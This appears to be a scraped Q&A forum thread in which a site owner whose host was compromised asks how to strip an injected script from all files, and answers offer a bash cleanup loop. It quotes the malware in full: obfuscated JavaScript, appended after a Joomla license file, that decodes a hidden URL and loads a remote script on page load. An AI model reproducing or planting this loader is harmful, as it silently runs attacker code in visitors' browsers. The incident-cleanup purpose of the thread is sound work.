Here is the back story. I have a friend whos host got hosed by a cross site scripting attack.
The following script at the bottom has been added to the bottom of all files. Does anyone have an awk or sed command to remove this? (there may be other javascript in files)
Appears script has been added to all files on host. HTML PHP JS.
Some files have php starting on a n开发者_运维知识库ew line some not. I need to find that script portion any where in a file and remove it.
<?php
/**
* @version $Id: COPYRIGHT.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
*/
defined('_JEXEC') or die('Restricted access');
?>
Joomla! derives from copyrighted works licensed under the GNU General
Public License. This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses. Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders. A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file. A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.<script>
function vdch() {
if(document.all.length > 3) {
var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);
</script>
- Count number of the appended characters (with
wc -c
on a file contatining only the appended script). In my examplelen=1807
. - Choose a uniq string which will identify file with appended script
(In my example
pat="new Array('#6a7072', '#723e29', '#2d7371'"
). - Make backup of affected directory.
Run following script in that directory:
#!/bin/bash
pat="new Array('#6a7072', '#723e29', '#2d7371'"
len=1807
TMP=$(mktemp)
find . -type f | while read f
do
if grep "$pat" "$f" >/dev/null
then
head -c -$len "$f" > $TMP
cat $TMP > "$f"
fi
done
The script will remove specified number of characters from the end of each file in which pattern was found.
head -n -50 yourFile
50
lines to remove at the end
精彩评论